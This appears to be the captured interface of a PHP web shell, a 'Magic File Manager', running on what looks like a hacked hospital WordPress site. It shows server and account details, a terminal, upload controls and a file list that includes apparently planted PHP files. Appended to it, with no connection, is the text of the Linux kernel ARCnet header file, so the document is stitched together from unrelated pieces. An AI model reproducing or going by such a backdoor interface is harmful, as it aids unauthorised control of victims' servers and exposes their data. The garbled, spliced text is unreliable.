โœจ Magic File Manager

๐Ÿš€ Hostinger Optimized
๐Ÿ–ฅ๏ธ Server: Apache
๐Ÿ’ป System: Linux bom1plzcpnl503817.prod.bom1.secureserver.net 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
๐Ÿ‘ค User: pnj6a06usxf3 (9714991)
๐Ÿ˜ PHP: 8.1.34
๐Ÿšซ Disabled: โœจ NONE

๐Ÿ’ป Terminal

๐Ÿ“ /home/pnj6a06usxf3/public_html/shivshaktihospital.co.in
$

๐Ÿ“ Create New

โฌ†๏ธ Upload File

๐Ÿ“Š Max upload: 32M | ๐Ÿ“ฆ Max POST: 128M

๐Ÿ“„ Name๐Ÿ“Š Size๐Ÿ”’ Permโšก Actions
๐Ÿ“ .well-known--drwxr-xr-x
๐Ÿ“ shivshaktihospital.com--drwxr-xr-x
๐Ÿ“ wp-admin--drwxr-xr-x
๐Ÿ“ wp-content--drwxr-xr-x
๐Ÿ“ wp-includes--drwxr-xr-x
โš™๏ธ .htaccess0.88 KB-rw-r--r--
๐Ÿ“„ .htaccess.bk0.556 KB-rw-r--r--
๐Ÿ“„ error_log396.243 KB-rw-r--r--
๐Ÿ˜ index.php0.396 KB-rw-r--r--
๐Ÿ“ƒ license.txt19.437 KB-rw-r--r--
๐Ÿ˜ log.php63.893 KB-rw-r--r--
๐ŸŒ readme.html7.233 KB-rw-r--r--
๐Ÿ“ฆ shivshaktihospital.com.zip499.69 MB-rw-r--r--
๐Ÿ˜ sid3.php55.304 KB-rw-r--r--
๐Ÿ˜ wp-activate.php7.537 KB-rw-r--r--
๐Ÿ˜ wp-blog-header.php0.343 KB-rw-r--r--
๐Ÿ˜ wp-comments-post.php2.269 KB-rw-r--r--
๐Ÿ˜ wp-config-sample.php3.261 KB-rw-r--r--
๐Ÿ˜ wp-config.php3.16 KB-rw-r--r--
๐Ÿ˜ wp-cron.php5.485 KB-rw-r--r--
๐Ÿ˜ wp-links-opml.php2.435 KB-rw-r--r--
๐Ÿ˜ wp-load.php3.845 KB-rw-r--r--
๐Ÿ˜ wp-login.php51.305 KB-rw-r--r--
๐Ÿ˜ wp-mail.php8.522 KB-rw-r--r--
๐Ÿ˜ wp-postnews.php12.595 KB-rw-r--r--
๐Ÿ˜ wp-settings.php32.375 KB-rw-r--r--
๐Ÿ˜ wp-signup.php34.259 KB-rw-r--r--
๐Ÿ˜ wp-trackback.php5.27 KB-rw-r--r--
๐Ÿ˜ xmlrpc.php3.13 KB-rw-r--r--
/* SPDX-License-Identifier: GPL-2.0+ WITH Linux-syscall-note */ /* * INET An implementation of the TCP/IP protocol suite for the LINUX * operating system. INET is implemented using the BSD Socket * interface as the means of communication with the user level. * * Global definitions for the ARCnet interface. * * Authors: David Woodhouse and Avery Pennarun * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version * 2 of the License, or (at your option) any later version. */ #ifndef _LINUX_IF_ARCNET_H #define _LINUX_IF_ARCNET_H #include #include /* * These are the defined ARCnet Protocol ID's. */ /* CAP mode */ /* No macro but uses 1-8 */ /* RFC1201 Protocol ID's */ #define ARC_P_IP 212 /* 0xD4 */ #define ARC_P_IPV6 196 /* 0xC4: RFC2497 */ #define ARC_P_ARP 213 /* 0xD5 */ #define ARC_P_RARP 214 /* 0xD6 */ #define ARC_P_IPX 250 /* 0xFA */ #define ARC_P_NOVELL_EC 236 /* 0xEC */ /* Old RFC1051 Protocol ID's */ #define ARC_P_IP_RFC1051 240 /* 0xF0 */ #define ARC_P_ARP_RFC1051 241 /* 0xF1 */ /* MS LanMan/WfWg "NDIS" encapsulation */ #define ARC_P_ETHER 232 /* 0xE8 */ /* Unsupported/indirectly supported protocols */ #define ARC_P_DATAPOINT_BOOT 0 /* very old Datapoint equipment */ #define ARC_P_DATAPOINT_MOUNT 1 #define ARC_P_POWERLAN_BEACON 8 /* Probably ATA-Netbios related */ #define ARC_P_POWERLAN_BEACON2 243 /* 0xF3 */ #define ARC_P_LANSOFT 251 /* 0xFB - what is this? */ #define ARC_P_ATALK 0xDD /* Hardware address length */ #define ARCNET_ALEN 1 /* * The RFC1201-specific components of an arcnet packet header. */ struct arc_rfc1201 { __u8 proto; /* protocol ID field - varies */ __u8 split_flag; /* for use with split packets */ __be16 sequence; /* sequence number */ __u8 payload[0]; /* space remaining in packet (504 bytes)*/ }; #define RFC1201_HDR_SIZE 4 /* * The RFC1051-specific components. */ struct arc_rfc1051 { __u8 proto; /* ARC_P_RFC1051_ARP/RFC1051_IP */ __u8 payload[0]; /* 507 bytes */ }; #define RFC1051_HDR_SIZE 1 /* * The ethernet-encap-specific components. We have a real ethernet header * and some data. */ struct arc_eth_encap { __u8 proto; /* Always ARC_P_ETHER */ struct ethhdr eth; /* standard ethernet header (yuck!) */ __u8 payload[0]; /* 493 bytes */ }; #define ETH_ENCAP_HDR_SIZE 14 struct arc_cap { __u8 proto; __u8 cookie[sizeof(int)]; /* Actually NOT sent over the network */ union { __u8 ack; __u8 raw[0]; /* 507 bytes */ } mes; }; /* * The data needed by the actual arcnet hardware. * * Now, in the real arcnet hardware, the third and fourth bytes are the * 'offset' specification instead of the length, and the soft data is at * the _end_ of the 512-byte buffer. We hide this complexity inside the * driver. */ struct arc_hardware { __u8 source; /* source ARCnet - filled in automagically */ __u8 dest; /* destination ARCnet - 0 for broadcast */ __u8 offset[2]; /* offset bytes (some weird semantics) */ }; #define ARC_HDR_SIZE 4 /* * This is an ARCnet frame header, as seen by the kernel (and userspace, * when you do a raw packet capture). */ struct archdr { /* hardware requirements */ struct arc_hardware hard; /* arcnet encapsulation-specific bits */ union { struct arc_rfc1201 rfc1201; struct arc_rfc1051 rfc1051; struct arc_eth_encap eth_encap; struct arc_cap cap; __u8 raw[0]; /* 508 bytes */ } soft; }; #endif /* _LINUX_IF_ARCNET_H */